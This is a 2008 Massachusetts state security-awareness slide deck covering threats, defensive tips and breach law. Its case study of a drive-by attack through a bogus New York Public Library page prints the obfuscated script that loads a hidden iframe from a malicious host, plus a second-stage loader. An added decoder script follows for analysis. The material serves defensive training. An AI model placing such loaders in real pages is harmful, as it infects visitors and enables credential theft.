
Cyber Security Awareness [Everything You Were Afraid to Know About Computer Security, But Always Wanted to Ask]

Commonwealth of Mass.

Information Technology Division

November, 2008

Objectives for Today
  • Understand network security threats
  • Learn simple defensive measures
  • Review some recent breaches
  • Introduce applicable new legislation
The Sermon
  • Sobering Statistics
  • Why do we need to be here today?
  • The Threats
  • How Things Go Wrong
  • Protecting Yourself
  • Have I Been Compromised?
  • A Few High-Profile Case Studies
  • A Recent Eye-Opening Incident
  • Security Resources and References
  • Q & A
Statistics
  • One new infected web page is discovered every 5 seconds
  • One in 500 e-mail messages contains confidential information
  • One in 2500 e-mail messages contains an infected attachment
  • 41% of people use the same password at every site they visit
  • In 2007, 37000 reported breaches of government and private systems occurred
  • Revenues from cybercrime now exceed drug trafficking as the most lucrative illegal global business, estimated at more than $1 trillion annually in illegal profits
  • 75 percent of companies surveyed in 2004 reported a data-security breach within the past 12 months. (The Ponemon Institute)
  • 70% of security incidents are inside jobs. (Gartner Group)
  • “Many government offices don’t even know yet that they are leaking information. 90% of cases are probably still not known.” – McAfee Criminology Report
Why are we here today?
  • The World has Changed!
    • Flying?
    • Technology Advancements
      • Moore’s Law: 50+ years of supporting data
      • Processor Speed
      • Memory (Smaller, Faster, Larger Capacity)
      • Hard Drives (Smaller, with Larger Capacity)
      • Price (“Bang per Buck”)
    • What was Impossible 10 Years Ago is Routine Today.
    • Searching for a Cure to Web Malware
Our Mission
  • We still need to do our jobs
    • Educating Students of the Commonwealth
  • Securing Cyber-Resources
  • ID Theft & Data Breach Legislation
    • M.G.L. Ch 93H
    • Executive Order 504
    • 201 CMR 17.00
The Challenge
  • Walking the tightrope between:
    • Taking full advantage of the constantly expanding wealth of IT resources available to us, and
    • Increased risk of exposure to attacks that accompanies increased reliance on technology.
  • Allowing business operations anytime and anywhere, via an increasing number of different devices and to an increasing number of mobile users and customers.
Threats to Students
  • MySpace
  • Facebook
  • YouTube
  • Peer-to-Peer Networks
  • Instant Messaging
  • Cyber Predators/Bullies
  • Inappropriate/Offensive Web Content
Threats to Networks
  • Two primary categories of threat:
    • Denial of Service
    • Loss/Leakage of Sensitive Data
Denial of Service (DoS)
  • Definition:
    • Flooding a network with useless traffic, to the point of slowing or completely interrupting regular services
  • Often in combination with groups of other remotely-controlled computers
    • a/k/a Bot Nets
    • Result: Distributed Denial of Service (DDoS)
Data Loss/Leakage
  • Definition:
    • Accidental leaking of sensitive information through sent data
    • Refers to the transmission of data which are either sensitive or useful in the further exploitation of the system through standard data channels
  • Result → compromise of data confidentiality
  • Since 2005, more than 200 million victims of data breach have been reported!
How Things Go Wrong
  • Actively
    • User does something explicit to enable compromise
      • Open an infected email attachment
      • Follow a malicious web link
      • Accept IM-initiated downloads
      • Execute Web 2.0 rogue application
  • Passively
    • Attacker breaks into the user’s PC via scans
      • Unpatched operating system
      • Buggy application software
      • Vulnerable open ports
      • Compromised legitimate web sites
How Things Go Wrong (cont.)
  • Carelessness
    • 98% of breaches are the result of “stupidity or inadvertent user action.” (IANS, 2007)
  • Actions by Malicious Insiders
    • 1.5% of breaches
  • Efforts by Organized Crime, Industrial Spies, and Foreign Government Agents
    • Least Frequent (~ 0.5%), but Most Costly, Most Sophisticated, and Most Difficult to Detect and Defend Against
Who is Most Vulnerable?
  • Those who don’t patch regularly and don’t keep A/V up to date
  • Dial-up Users (but not very appealing to attackers)
  • Home Broadband Users
  • University Users
  • Mobile Users
Protecting Yourself
  • Patch, Patch, Patch!
    • Use auto-update whenever possible
  • Anti-Virus Software (update daily)
  • Anti-SpyWare Software
  • Personal Firewall Software
  • Set and use good passwords on all accounts
    • How Strong is Your Password?
  • Encrypt Sensitive Data
  • Separate Student and Teacher/Admin Networks
Protecting Yourself (cont.)
  • Wireless Networks… Beware!
  • Wireless Routers/Access Points:
    • Change default password and default SSID
    • SSID name should be “non-trivial”
    • Disable broadcasting of SSID if possible
    • Enable WPA/WPA-2 encryption, and change default key
    • Enable and use MAC filtering
  • Don’t save user IDs and passwords on your hard drive
  • Don’t Web surf from a privileged account!
  • Turn off auto-run for removable media
  • Practice “Safe Internet”
    • E-mail attachments
    • Downloads from Questionable Sites (esp. Freeware)
    • Peer-to-Peer Networks; Promiscuous Files Sharing
10 Tips for Fighting Malware
  • Install (and use!) Anti-Virus Software
  • Install a Personal Firewall
  • Install an Anti-Spyware Tool
  • Patch!
  • Keep Browser Security Settings at Medium or High
  • Just Say “No!” to Orgs You Don’t Know/Trust
  • Avoid Browser Search-Help Bars
  • Verify Software Certificates Trusted by Your Browser
  • Get a Credit Card Only for Internet Shopping
  • Don’t Run Executable E-mail Attachments (Even From a Known Source)
Have I Been Compromised?
  • How to tell if you’ve fallen victim
    • Abnormal slowdown in performance
    • Mysterious failures in commonly-used apps
      • Email
      • Web surfing
    • Unexpected popups
    • Mysterious/Unexpected outbound traffic
      • The only sure-fire way to detect a compromise
  • Cleaning a Bot:
    • Painful!
    • Requires 8-16 hours of cleanup time
    • Best if done by a professional
Data Breach & ID Theft
  • M. G. L. c. 93H and 93I
    • New law went into effect October 31, 2007
    • Civil fine of up to $100 per affected person
  • Executive Order 504
    • Mandatory information security training
    • Effective September 19, 2008
    • Training for current staff within 12 months
  • 201 CMR 17.00
    • Mandates encryption of personal data
    • Effective January 1, 2009
Cyber-Breach Poster Children
  • Milton Academy Network Breach (Nov ’07)
  • Needham PowerSchool Breach (August ’08)
  • GOP Stolen Laptop Unencrypted (September ’08)
  • CardSystems Solutions
  • TJX Companies, Inc.
  • CitiFinancial Services
  • Boston College
  • Monster.com
  • Massachusetts DPL
  • Nordea Bank (Sweden)
In the News
  • Commonwealth of PA, 1/4/08
    • Network attacked via compromised agency web pages
      • SQL injection used to update DB tables with links to malicious website
      • Users who visit compromised agency’s web site are silently redirected to a series of malicious web pages that try to exploit client-side (i.e., user’s) vulnerabilities in a number of applications
        • IE, RealPlayer, et al
      • Vulnerable systems become infected with malware
    • An example of “drive-by downloads”
Evolving Threats to Users
  • New and sophisticated forms of attack
    • “Customized” viruses, self-modifying threats, and threats that “attack back”
  • Attacks targeting new technologies
    • Peer-to-peer and VoIP services
  • Attacks targeting online social networks
    • MySpace, Facebook, YouTube, etc.
  • Attacks targeting online services
    • Especially online banking
New Threat: Spamdexing
  • Web Searches!
    • 20% lead to unwanted content or malware sites
    • 80% of search blocks point to offensive content
  • “Drive-by Downloads”
    • Compromised, legitimate web site silently redirects user to malware sites
  • Mitigation: “corporate safe web search tool”
    • Notify web users of potential risks in real time
Resources & References
  • US-CERT (United States Computer Emergency Readiness Team)
    • http://www.us-cert.gov/
  • MS-ISAC (Multi-State Information Sharing and Access Center)
    • http://www.msisac.org
  • Identity Theft Research Center
    • http://www.idtheftcenter.org
Close to Home: a Lesson
  • Analysis completed on October 30, 2007
  • Involved breach of non-secret military network
    • But… could happen to anyone
  • Attack vector?
    • New York City public library!
NYC Public Library (cont.)
  • Hidden in the bogus NYPL web page is:
  • What’s that???

<script type="text/javascript">

<!--

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%6F%74%62%61%6C%6C%70%6F%72%74%61%6C%2E%69%6E%66%6F%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%20%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));

//-->

</script>

NYC Public Library (cont.)
  • What’s really there:

<iframe src="http[:]//fotballportal.info/out.php?s_id=1" style="visibility: hidden;display: none"></iframe>

  • This redirects user to “http[:]//meraxe.com/fsp1/index.php”
    • This all happens silently and invisibly!
  • What’s at meraxe.com…?
NYC Public Library (cont.)
  • At meraxe.com, we find:

<script>function v4726d05808fd9(v4726d058097a8){ function v4726d05809f78 () {var v4726d0580a748=16; return v4726d0580a748;} return(parseInt(v4726d058097a8,v4726d05809f78()));}function v4726d0580af18(v4726d0580b6e8){ function v4726d0580ce59 () {var v4726d0580d630=2; return v4726d0580d630;} var v4726d0580beb8='';for(v4726d0580c68d=0; v4726d0580c68d<v4726d0580b6e8.length; v4726d0580c68d+=v4726d0580ce59()){ v4726d0580beb8+=(String.fromCharCode(v4726d05808fd9(v4726d0580b6e8.substr(v4726d0580c68d, v4726d0580ce59()))));}return v4726d0580beb8;} document.write(v4726d0580af18('Truncated));</script>

  • Effects:
    • The above code is (silently) downloaded and executed
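
Added example (not part of the original presentation): a static decoder for the two obfuscation layers shown on these slides, the percent-encoded document.write(unescape(...)) wrapper and the two-hex-digits-per-character second stage, plus a check for CSS-hidden iframes. It never executes page content; the sample page and the host tracker.example.invalid are constructed placeholders, and all function names are assumptions.

```javascript
// Added example: static decoding only; nothing from the page is ever executed.
// Sample input is constructed; tracker.example.invalid is a placeholder host.

// Layer 1: percent-decode the argument of document.write(unescape('...')).
function decodeUnescapeWrites(html) {
  const re = /document\.write\(\s*unescape\(\s*(['"])((?:%[0-9A-Fa-f]{2}|[\w .\-])*)\1\s*\)\s*\)/g;
  const out = [];
  for (const m of html.matchAll(re)) {
    out.push(m[2].replace(/%([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
  }
  return out;
}

// Layer 2: the second-stage script turns a hex string into text two digits at a time.
function decodeHexPairs(hex) {
  if (!/^(?:[0-9A-Fa-f]{2})*$/.test(hex)) throw new Error('not an even-length hex string');
  let text = '';
  for (let i = 0; i < hex.length; i += 2) text += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  return text;
}

// Report iframes hidden with CSS, with the URL defanged for safe logging.
function findHiddenIframes(markup) {
  const hits = [];
  for (const m of markup.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const src = (tag.match(/\bsrc\s*=\s*["']([^"']*)["']/i) || [])[1] || '';
    const style = (tag.match(/\bstyle\s*=\s*["']([^"']*)["']/i) || [])[1] || '';
    if (/display\s*:\s*none|visibility\s*:\s*hidden/i.test(style)) {
      hits.push(src.replace(/^http/i, 'hxxp').replace(/\./g, '[.]'));
    }
  }
  return hits;
}

// Constructed sample mimicking the pattern on the slide.
const toPercent = s => [...s].map(c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const toHex = s => [...s].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const iframe = '<iframe src="http://tracker.example.invalid/out.php?s_id=1" style="visibility: hidden; display: none"></iframe>';
const samplePage = `<p>Library hours</p><script>document.write(unescape('${toPercent(iframe)}'));</script>`;

function analyzeSample() {
  const layer1 = decodeUnescapeWrites(samplePage);
  return { layer1, hidden: layer1.flatMap(findHiddenIframes), stage2: decodeHexPairs(toHex(iframe)) };
}
console.log(analyzeSample());
```

Run it with Node.js against saved page source; the defanged URLs it returns can go straight into a ticket or blocklist review.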
NYC Public Library (cont.)
  • What happened???
    • Downloaded and executed a file (age.exe)
      • Added file c:\WINDOWS\system32\control.dll
      • Added several Registry entries
        • Control.dll is loaded as a Browser Helper Object (BHO) when IE is started and becomes a keylogger
      • Deleted itself
  • Effects:
    • Control.dll monitors data entered into forms in IE
      • Steals user’s login credentials for legitimate web sites
        • On-line banking, credit cards, eBay, Paypal, etc, etc
    • “Phones home” with stolen data
Q & A
  • Summary:
    • Protecting yourself is only half the battle
    • Constant vigilance & awareness are a must
      • “Trust, but verify.” – Ronald Reagan, quoting an old Russian (!) proverb
  • Questions…?